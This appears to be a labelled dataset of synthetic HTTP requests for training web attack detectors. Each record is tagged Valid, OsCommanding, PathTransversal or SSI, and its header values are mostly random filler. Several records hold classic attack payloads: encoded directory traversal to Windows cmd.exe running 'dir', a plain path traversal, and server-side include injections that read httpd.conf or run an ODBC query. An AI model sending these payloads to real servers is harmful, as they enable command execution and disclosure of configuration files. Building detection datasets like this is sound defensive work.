Cookie: .pt0=87
Cookie2: $Version="566"
Date: Sun, 26 Apr 09 11:22:54 GMT
ETag: "gY1vMtzXVC4AuJDCwZH"
Expect: 100-continue
From: r4o9@ecoOy.ch
If-Modified-Since: Mon, 07 Sep 09 17:40:37 CET
If-Unmodified-Since: Wed, 01 Nov 06 02:19:37 CET
If-Match: "63Pq5KEjTGKQ-t4iz"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Basic Y2duZGVjVXM6dGhpaQ==
Range: -4597,119988-57606
Referer: /aEeda/balkttn.asp
TE: chunked;q=0.9
Trailer: Host
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 9.7; jn-a8; rv:6.3.9) Gecko/78623670
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 059x5664
Via: HTTP/7.4 www.nnIe5p.shtml, HTTP/9.6 www.trtrng5i.html
Transfer-Encoding: compress
Upgrade: tilnna/3.3
Warning: 572 93.181.174.70:9 "Nv99hl5yheexr" "Tue, 08 Jan 08 21:03:46 UTC"
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 899542790
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

yUQq-9XW3S=DUatgdxyexleqzv4g&w5b=7tG

End - Id: 34557
Start - Id: 44235
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 194.69.118.13
Connection: Rjn6kE
Accept: audio/*, text/html;q=0.7, application/rtf;q=0.4
Accept-Charset: iso-8859-2, koi8-r, gb2312;q=0.6, windows-1254, iso-8859-1;q=0.5
Accept-Encoding: *
Accept-Language: a-aq, mlt-giws;q=0.4, sux-neddrDno;q=0.7
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="9"
Date: Wed, 02 Dec 09 03:52:43 CET
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: 100-continue
From: ided@udhoes.uk
If-Modified-Since: Sat, 06 Feb 10 14:14:44 GMT
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: "9MutcHvrPBwBNQjs4@m"
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: "KYZOOKQ2z4Kot3kdi"
Max-Forwards: 6670
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 0-3876
Referer: http://www.etypyne9.cz/n4rd8ee/OtaEf/aeLsoyt.mp3
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: uezce/6.5
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: ope/1.8 62.62.143.236:28778, meretn/5.3 www.sro8rN.shtml
Transfer-Encoding: identity
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44235
Start - Id: 10163
class: Valid
GET /eFCiCJUsfpaDsJSxc_7E/amschtmuvswetearpti/mewiobelon/hzRnrZtdn1kmh/s8Tlp9i/t_k_my-mfKA/ahof/Evd9FuBfe9mVFIB/lS4TR7l3EodWbwN7yzL/e1roaMekd/qU2b.js?FQh0bfehP2-=dzTn&rt79clLhsyoi=nvAyH&noeewfod3gle=9828240303&mUdocumentgPr=oaOIsmOstowe05nXu HTTP/1.0
Host: www.eahs.cz
Connection: mbgnvih
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ge7Vphst-osradmr;q=0.4, nebd-saoGp4;q=0.8, cCsdamt-HlH;q=0.1, ole-easaieit, lIxHetP-oc;q=0.6
Cache-Control: max-age=77464
Client-ip: 206.184.127.225
Cookie: PToHKAZ7OyND=097003
Cookie2: $Version="8"
Date: Fri, 20 Oct 06 23:21:00 UTC
ETag: "UnbrD7SaHsbRQN8"
Expect: Vragla=VgAer;e1sEliaf
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sun, 06 Aug 06 12:29:29 CET
If-Unmodified-Since: Wed, 12 Mar 08 19:02:02 CET
If-Match: "9D4iOCYsDL14Gv_"
If-None-Match: *
If-Range: Tue, 20 May 08 19:06:28 CET
Max-Forwards: 09
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM b3R0bnJtdFQzdHBseXNzaTNmYzVvaXl0ZXJ1b2VhY2ZvOQ==
Authorization: NTLM bXFlOWQ5bzJneW55UDlvbHRyaXFzZWh0RDBoZGx3ZXNhdG5jMUF1dWp3emR0
Range: 35-
Referer: http://www.t7pui.uk/iTromdaT.pl
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: TE
User-Agent: Mozilla/5.3 (Windows; U; WinNT 4.5; yw-ne; rv:6.8.4) Gecko/57068110
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: 9.1 24.181.254.194, HTTP/4.2 www.yyim6cwr.js, enosEo/1.4 120.26.4.81:818
Transfer-Encoding: deflate
Upgrade: toiw/9.5, atmso/8.6, 3vnwf/5.8
Warning: 109 252.20.208.165 "rNuyl" "Mon, 17 Jul 06 17:30:19 GMT"
X-Forwarded-For: 7.157.226.155
X-Serial-Number: 87261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10163
Start - Id: 14378
class: Valid
GET /sLiJhiAy9EzAXg/ot2mu/ftnehseAsedsi4ijai/e9tnMe0hOn.jpeg?smoteRs1AOoim=ei+ox HTTP/1.1
Host: 12.142.33.20:80
Connection: keep-alive
Accept: image/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=94
Client-ip: 166.239.11.152
Cookie: Ys7oMcd=hnbloand;hesr5xoie=ee;jiNro=oeA8c2osnao;gain=>
Cookie2: $Version="956"
Date: Fri, 23 Oct 09 18:22:49 CET
ETag: W/"GjGgvGraJvEvMOTxn"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Wed, 19 Aug 09 19:05:33 CET
If-Unmodified-Since: Mon, 13 Aug 07 04:44:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Jan 09 24:41:19 GMT
Max-Forwards: 176
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest qop=auth
Range: 6035-,928-
Referer: /ne42ea8t.php4
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.1 (X11; U; Linux i586 2.4; r7-hu; rv:1.6.3) Gecko/06871397
UA-CPU: StrongARM
UA-Disp: 3544,5975,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8463x313
Via: diwe/6.7 225.6.28.207
Transfer-Encoding: compress
Upgrade: egtiin/0.3
Warning: 596 232.43.0.142 "o7nreoNhqvei" 
X-Forwarded-For: 182.69.80.158
X-Serial-Number: 24080640322850948511
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14378
Start - Id: 44316
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 5.190.125.120
Connection: di1du
Accept: */*
Accept-Charset: x-mac-roman, iso-8859-6;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: tex-af;q=0.8
Cache-Control: min-fresh=83
Client-ip: 150.122.198.96
Cookie: 4o@scripthtpassgt=mtmewl%rsdocumentd;nbUn=aestbd)vnodeti~o;htqaieieVhdbaaN=+e;es=S6Leh2Sairsaanddndh;lbgftr=hxOee;iib=~otsy 
Cookie2: $Version="30"
Date: Sun, 08 Jan 06 22:08:11 GMT
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Thu, 29 Dec 05 06:19:38 CET
If-Unmodified-Since: Sat, 02 May 09 03:46:53 GMT
If-Match: "i1XROXjp6_DZVBdZOx4"
If-None-Match: *
If-Range: *
Max-Forwards: 17
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM cDRuYWFMbnRlZWxjZWFnbzdtZWVvcm5tb2hrY2VobXJiZG9z
Authorization: NTLM cG5tZWl0dDRhb2dvbk50Q3Nhb2RibmVhc2xzMXg5czZlV2hodHJobzBjOWlnaWlz
Range: -2
Referer: http://setsaf.net/yti5Hs/3ket.gz
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: lhLS8l1IH http://www.tcjySe.gov
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: apeOl/9.9 www.edtlncmS.js
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44316
Start - Id: 7427
class: Valid
POST /r2jDtoUN/ittghcm5sdobndt6.html? HTTP/1.1
Content-Length: 228
Content-Language: i
Content-Encoding: identity
Content-Location: http://www.nRelldsq.st/hosN4w3n/ldady/xdhbct/ajsioey/A36he.asp
Content-MD5: YWVldHRlcG8ydmlhcGVvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 04:14:55 GMT
Last-Modified: Sun, 05 Nov 06 06:14:42 UTC
Host: 93.237.220.56:785
Connection: keep-alive
Accept: video/mpeg;q=0.8, audio/*
Accept-Charset: iso-8859-9
Accept-Encoding: gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 160.48.187.134
Cookie: 2Prx=\Wqm;uirnnhrtizse=284
Cookie2: $Version="5"
Date: Tue, 28 Jul 09 14:31:58 UTC
ETag: "O-gjSBMZe-BzBftUs1"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 28 Jul 07 01:24:20 UTC
If-Unmodified-Since: Sun, 13 Jul 08 21:27:04 UTC
If-Match: "-up4Q@JhSbPMtImgOcOi"
If-None-Match: "QPiEhJ0dk8MnV6aH-3"
If-Range: Sun, 19 Jun 05 04:47:31 CET
Max-Forwards: 3764
MIME-Version: 3.8
Pragma: Sdoxa=tNren
Proxy-Authorization: NTLM ZWFybHRmS3phaGRyNW9pbGVjYXJ5dHI0ZmRzb2FpcnR0d2E=
Authorization: Digest nc=965bc9eD
Range: 1-587,1-,-06
Referer: http://Rsoct.de/rlLncaE.rar
TE: chunked,trailers
Trailer: TE
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 6.4; sl-Eo; rv:8.2.7) Gecko/01228144
UA-CPU: MIPS
UA-Disp: 0192,953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2293x2568
Via: 1.7 3.203.29.142
Transfer-Encoding: eedhr; esZmhhhe=4erlos
Upgrade: tUs1la/5.6
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 208.252.109.22
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

iolrlg=amno6hroasd3e&sks3risPduoaDte=1PhxlinkI6hmAeN&OoCOC3Pexecnrmp=lCoan=&sqrSuatcw=5&wxtermdocumentrSdIUall=4301242&DKsusrP7Y=s8Ev1Trk&astn=llnx8Se&jnmEe=autoexeccta;&6OJAarjr=171797&Yegrs=srcitloeeG&Slnih6=5rnhtxmnA4oeyT

End - Id: 7427
Start - Id: 45228
class: PathTransversal
GET /../../? HTTP/1.1
Host: 100.6.16.236
Connection: isIaApt
Accept: text/html;q=0.3
Accept-Charset: macintosh;q=0.3, x-mac-cyrillic;q=0.5, euc-tw, euc-jp;q=0.5, windows-1257;q=0.2
Accept-Encoding: 
Accept-Language: h-rs2oTam, 3seimhn6-gmDtwx8e;q=0.4
Cache-Control: no-cache
Client-ip: 91.52.105.115
Cookie: glinuata=tje_8U6i;ra6hcfvDvitr=250;hew6cy2=aaxert6;trfln=2435663;bh0ke2sek=88536033
Cookie2: $Version="1"
Date: Tue, 10 Nov 09 21:24:21 GMT
ETag: W/"HAjYQ@UH.6s769k_XZxi"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: *
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 128
MIME-Version: 3.6
Pragma: a2tot=rebrch
Proxy-Authorization: Digest qop=evai40
Authorization: Digest uri=/elhaoter/Akjpd/irwehq/hNnNyd/aa3at.php4
Range: -01750,762-,10389-0
Referer: http://6ht9u.com/eA4rs/saanwn/mreinee.doc
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/1.5 (compatible; a9mhNz; WinNT; Etrya; 9seyn; NnRideIe)
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: lsp9l
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 90.180.246.61
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45228
Start - Id: 39689
class: SSI
GET /tHR1EJx7tDfo_R5E@z/agPeoofoxuh8/nes.jpeg?8ei=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&wI=eX6Rx3C HTTP/1.0
Host: 192.47.65.255
Connection: close
Accept: text/xml, video/quicktime, video/*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 170.88.156.59
Cookie: hooIeisitumoi=25051156
Cookie2: $Version="38"
Date: Mon, 18 Sep 06 11:17:26 UTC
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Fri, 10 Jun 05 18:00:36 GMT
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: *
If-Range: "PC4YnNF.rB2Ck3eXr"
Max-Forwards: 2
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM blVvM3kwZm9pbmFhY2FydHY1ZXNFbmlwYXo3bXd1VWV1aWVlWWlu
Authorization: Digest opaque="Dasas"
Range: 11490-87515,-392,063833-721563
Referer: http://www.roev.cz/trssr/Ifteo/nnrgresi.tiff
TE: chunked;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/5.8 (compatible; Konqueror/9.4; SunOS sun4u; hdhmip)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.3 www.yrla.htm
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39689
Start - Id: 15951
class: Valid
GET /nY/iKaxp_O6cat/i_L/servicesFu7ii3.H/2hthaheth/oMpstdinyBLiopt3/f8i2RbUKG7ln.b.pl? HTTP/1.0
Host: 26.166.199.1:80
Connection: tzioa4na
Accept: */*
Accept-Charset: x-mac-arabic, windows-1251;q=0.9, x-mac-arabic;q=0.7, big5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=32
Client-ip: 240.237.65.163
Cookie: IbJxmliframe=2639947025;.5gSWR=ethyn;4s=42;ncr=OrS;lun=lnohbarev;1z0dXfzcNE=Nd(
Cookie2: $Version="326"
Date: Sun, 13 Aug 06 19:13:53 CET
ETag: W/"C9Iv_vJKv0JQVdgIJm@l"
Expect: ceitrdo
From: foupIigo@8aw9mD.net
If-Modified-Since: Wed, 09 Jan 08 23:56:12 UTC
If-Unmodified-Since: Tue, 16 Mar 10 11:46:15 UTC
If-Match: *
If-None-Match: "M09@u8mNWNKdpj1T"
If-Range: *
Max-Forwards: 585
MIME-Version: 6.0
Pragma: 21le='wdr'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: NTLM ZXdoZW5pZ3B3YXJsZWlDaWhOTGN3c2pzZWFhZWRuM3BzQm9tbWVvZ2VnYWphNQ==
Range: 00424-7094,829-49684
Referer: /pi2de/sbEq4arU/9EdRnc.avi
TE: chunked,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (Windows; U; Win98 9.3; 6n-na; rv:1.5.8) Gecko/65054451
UA-CPU: StrongARM
UA-Disp: 9788,9519,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7490x6757
Via: 2.4 179.148.212.98, FTP/7.0 www.Ciw9r.js, scV/7.8 227.216.227.244:681
Transfer-Encoding: tIyd
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 85.163.36.22
X-Serial-Number: 902795825
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15951
Start - Id: 40949
class: SSI
GET /cRwQ5rRvqvIs1Iou/rHksXX@mrins-6h1iKM/ePaerwenn1os.cgi?yn34=aBp-61vSdCCM&2sfdno=iyp%40mnnw&atar=670&Ccpx8r=ivsT&8IA0sstyleevalpassthrun=eZ.bJ7muVDrT&2tsssy0sesmnh=efO%3FaStmpusw2%3F7O6fta&hsPsteFRcm=ins&oelaWy6e=160&ejtrf2e=o-tt3&rISur=3hptuwe74soti%3Be&efm=lk&7edsravhrvge=ireiiSid+a%3A&sIai=87&BftpjXM6Ub=%3C%21--%23odbc++++statement+%3D++%22select+++tlYewai%2C+++eTBpd%2C++ii4+++from+vhtr29+++order+++++by+6%2C+++49%2C++9%22+--%3E HTTP/1.0
Host: www.zihtre.gov:80
Connection: ghlatit
Accept: audio/*, application/*;q=0.9, text/html;q=0.0
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.2
Cache-Control: max-age=4228
Cookie: mh=dEaT;OBwindow.openJYnjV-IZX=73235;onojLgcmaoiprfa=c7fe1nuhq4L7
Cookie2: $Version="7"
Date: Fri, 06 Jan 06 03:23:08 GMT
ETag: "x4FUphGSaCYYxv2zm0Nz"
Expect: 100-continue
If-Modified-Since: Wed, 22 Mar 06 06:14:21 UTC
If-Unmodified-Since: Mon, 13 Feb 06 12:25:57 UTC
If-Match: "Pi6lzpKpTKJrHtmq"
If-None-Match: *
If-Range: *
Max-Forwards: 49
Pragma: cic=1sn
Proxy-Authorization: Digest uri=http://pubtmS.fr/cUdevTmc/neroi2.doc
Authorization: NTLM YXRpNGlvOTR6ajlvZWdBODZhdG1rc29ENXRza2Z5ZHRYcm5tc3BvV2V0YWNu
Referer: /ncEeaHcm/w5eiie/tpas/sener.php
TE: trailers,chunked;q=0.4
User-Agent: e7osteti (icaMoB2v; ecVt18; sLm4U5n; ed9qN8)
UA-Disp: 7298,0311,16
UA-Color: color16
Via: 9.4 161.193.109.74, FTP/7.1 www.btunngsh.png
Transfer-Encoding: gzip
Upgrade: xlbyEu/9.7, ne2/8.9, fih/5.4
~~~~~: ~~~~~~~~~~

null

End - Id: 40949
Start - Id: 22090
class: Valid
GET /o4I@cQ_0n/eb5QihQT@sIaR/lifhTQo/dI8H_6VwU3x/4DOecho1connectajSDF/gy1/imulhaconor8nfp8/sbE7Wvulid5i8EM6N/s2voo/t4v2RE1RG/tM1ar4S.mdb?gWHG=893&cwg6okg=kHfraAaett%26rt&faei=o88%25uew5i%25e HTTP/1.1
Host: 116.175.252.254
Connection: tosrE
Accept: */*
Accept-Charset: x-mac-turkish;q=0.6, windows-1250;q=0.3, iso-8859-3, isiri-3342;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 96.215.51.114
Cookie: ArrAxdEiy=46961240;idpttnfoezgy=jobjecte7iwnngoiuautoexecqoa;oSrlSfrdtn=00980474
Cookie2: $Version="55"
Date: Tue, 12 Oct 04 18:09:12 CET
ETag: "@8wx4JTUYk9t0x0R"
Expect: 100-continue
From: eidhdeG@fpho.st
If-Modified-Since: Thu, 12 Apr 07 08:38:19 GMT
If-Unmodified-Since: Thu, 03 Aug 06 08:53:51 UTC
If-Match: "Crlysb.4o0VI60CwE"
If-None-Match: *
If-Range: Thu, 16 Sep 04 15:25:18 UTC
Max-Forwards: 0071
MIME-Version: 1.8
Pragma: axscd=4dva
Proxy-Authorization: Basic czFoa2FFOm9yaHJ0cA==
Authorization: NTLM ZWVzdWF0aHJuZWdBZG93ZWVhbENpZGVpYXRmaWNldWdyZQ==
Range: -63,8739-,76572-
Referer: /gac1ai.tiff
TE: trailers,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 7.9; 8p-is; rv:7.5.1) Gecko/59110899
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8724x0388
Via: 5.3 167.32.211.49
Transfer-Encoding: deflate
Upgrade: ireEu/5.5
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 22090
Start - Id: 7440
class: Valid
POST /tfy1uRtrqOtH/WpS5.htm? HTTP/1.0
Content-Length: 101
Content-Language: snl
Content-Encoding: deflate
Content-Location: http://croeMRyr.net/ehnn/eeyoE/smfl9E/mRndct.mdb
Content-MD5: aWVleXBlbmhoZTJpaWM3cQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Sep 09 09:55:53 UTC
Last-Modified: Thu, 05 May 05 16:13:47 UTC
Host: 112.86.206.24:80
Connection: close
Accept: image/png;q=0.0, application/*;q=0.1
Accept-Charset: x-mac-turkish;q=0.7, cp-932;q=0.4
Accept-Encoding: 
Accept-Language: gH-ecaaoX;q=0.5, htaoobp8-ysfrbrh;q=0.3, leeaziqE-rtewitc;q=0.9, rosItnof-r6;q=0.2
Cache-Control: no-transform
Client-ip: 88.207.186.172
Cookie: h7Oie=64;m58ev=67343;isgRmriwhe=du)e;h6mt=314;5dhGsanlfmzaseP=s-as
Cookie2: $Version="834"
Date: Thu, 13 Sep 07 24:55:27 GMT
ETag: "VO2oXug7Ze7_o2J"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sat, 21 Apr 07 06:31:59 UTC
If-Unmodified-Since: Sat, 09 Dec 06 13:49:19 UTC
If-Match: *
If-None-Match: *
If-Range: "ePIf-G61rR3LoQkp"
Max-Forwards: 745
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM bmU4RW9kd2dobnNtaXJ0YWNub2dyOW55cm1lUE5kdTFmd2dhbGVIMHZpdDA=
Authorization: Basic dGVhQVVpbGg6dE5zbnNBZW0=
Range: 0-,-49951,-3664
Referer: http://www.jLtet.biz/lOo7o3d/haau1u/rIcasts/dodrio.sh
TE: deflate;q=0.2,chunked;q=0.3,gzip
Trailer: Host
User-Agent: ri36leeb (aXOZC@hzoK; oxWxsYgZD)
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2293x2568
Via: 4.8 www.wwncGen.jpg
Transfer-Encoding: deflate
Upgrade: coig/7.2, 3eo/7.1, esee/4.2, dnw/5.7
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 137.37.20.120
X-Serial-Number: 705782938216902909
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rspmsioNe=17206716&E0_6c=eD&afctRs=hc&Etb=deo6RkdEE&MZxc.BIt=ej96eSte&ptnaaeayv6=1e&.5S.denITGCa=ur8j

End - Id: 7440
Start - Id: 16950
class: Valid
GET /hXKunionoBNsO-htpassreplacevj/d8xLxdfoQterrrjsw/q03cvns6uQ0/p29nuotebhpoosr/iQaQV/2WzFFB/x8h_awIGQCO/nuRO2h.jpeg?ttyeb=513729&wslafi=6899330&erxIrr=ha&ildsren59y6aht=optemecslhetUapN&5oeeemNac1gitro=is6dngsdToRetdss HTTP/1.1
Host: 137.168.115.170:9
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8
Accept-Encoding: deflate;q=0.5, identity, deflate
Accept-Language: ljtcreho-uts0cs;q=0.5, Enhbrsme-eessle;q=0.9
Cache-Control: max-age=3156
Client-ip: 65.159.241.124
Cookie: aepceh0Qlia=9r tJce1 \0est;eu=idpE4DQ-3l;mh2snsnnaho0t=orx rz7ii(winnt\Knulle&mrrs;xWRs=82572699;ooo=19;thdahitt=44
Cookie2: $Version="526"
Date: Sat, 25 Nov 06 19:34:20 UTC
ETag: W/"ZFCvbK-c00gfAxGm"
Expect: lgehot
From: adqTnemz@inishn.ch
If-Modified-Since: Wed, 26 Dec 07 04:33:28 CET
If-Unmodified-Since: Sat, 11 Jun 05 08:01:08 UTC
If-Match: "2QZj6dbdYiwdZc9U"
If-None-Match: *
If-Range: Tue, 03 May 05 02:02:55 UTC
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: 0N9cpr nregcI0a=lzil
Authorization: Basic UjlhNmU6YWhybmllZA==
Range: -648885,06-7154
Referer: /tiktinwE/rro4E/nfnuew.msf
TE: gzip;q=0.9,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 9.4; eg-ee; rv:5.5.6) Gecko/03668764
UA-CPU: 68000
UA-Disp: 290,6190,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 453x250
Via: 0.0 www.EatoL.js, mli0/8.1 www.tyai.jpg:1936
Transfer-Encoding: boisb
Upgrade: atrUe/4.0, 1tC/3.8, irm/0.5, 0uBS/4.3, t3o/6.0
Warning: 192 84.133.95.53 "rthasExesecsg3nhOcn" "Sun, 14 Feb 10 11:00:32 GMT"
X-Forwarded-For: 234.74.157.132
X-Serial-Number: 913897640991
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 16950
Start - Id: 10456
class: Valid
GET /replaceRG./IGLr9ga/rantosomrwa.exe?rl6qq5E4jrro=o86ck3tee&pwlldsesu6t=767&dy=Laososll15eE&sAsde=9366771&snhDo16miso=%3CssHe774dwvitsygm%29n&i8apyromdqChe=592117&smte2Ty3=s+ofa&ISTgEd5Lx=srNN&autoexecdAh=i++l HTTP/1.1
Host: www.OacertgyD.be
Connection: close
Accept: text/*;q=0.2, text/*;q=0.0
Accept-Charset: big5;q=0.3, windows-1257
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 64.61.12.166
Cookie: esTafistIase=lWnhOWAvruSO;ym9cnfnq=e7/+ ;tnleo=3821;oo5=rDAJEzM
Cookie2: $Version="955"
Date: Thu, 08 Feb 07 08:11:31 UTC
ETag: W/"E7SJFnASO1TYXWbI"
Expect: KaIepego=9euhn
From: adwhievh@07neTe5sO.uk
If-Modified-Since: Mon, 22 Aug 05 11:02:22 CET
If-Unmodified-Since: Fri, 26 May 06 08:02:09 GMT
If-Match: *
If-None-Match: "-50on89I6ho5nqCX.hST"
If-Range: "Nrula_rMguqVUMH2z"
Max-Forwards: 06
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXp1aUhzYWU6cXRpdHJublU=
Authorization: Basic ZHRybGdrdDpzb2dyRWhudA==
Range: 5-355295,61313-1,05930-37268
Referer: http://www.ioswr.org/kisebhe/cheyha/trAng.jsp
TE: trailers
Trailer: Expect
User-Agent: aDid (eMiWU.Y; b1Gm5-ey3; r6oF66o@oX; eORp.cg; swuxD8_)
UA-CPU: StrongARM
UA-Disp: 4910,021,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 166x378
Via: FTP/7.6 www.Rtre.gif, HTTP/7.6 247.238.200.57, retor/7.3 www.eqtqao.html
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 079 207.58.135.243:6637 "lldeeiya7z2nb" "Sat, 20 Mar 04 17:46:02 CET"
X-Forwarded-For: 39.2.165.130
X-Serial-Number: 23963701086419023023
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10456
Start - Id: 18763
class: Valid
GET /9aA8iufastmp1wha/gdzerutsneL/d2hstpnn7oreGS5op/tlybhren/likeOpHChQel03/lEdacUIgESz@PFBOWG/t2FrsApaAoi.js?ihxei0ltM=Ttnn6%40H0&se5rlncho=548824&nho2iap=36&wdIts=enklqprvn2nrMiejns&gstde3h=3191907&oieesl2JiRone=48194226&huIelH9lsun=ra7i HTTP/1.1
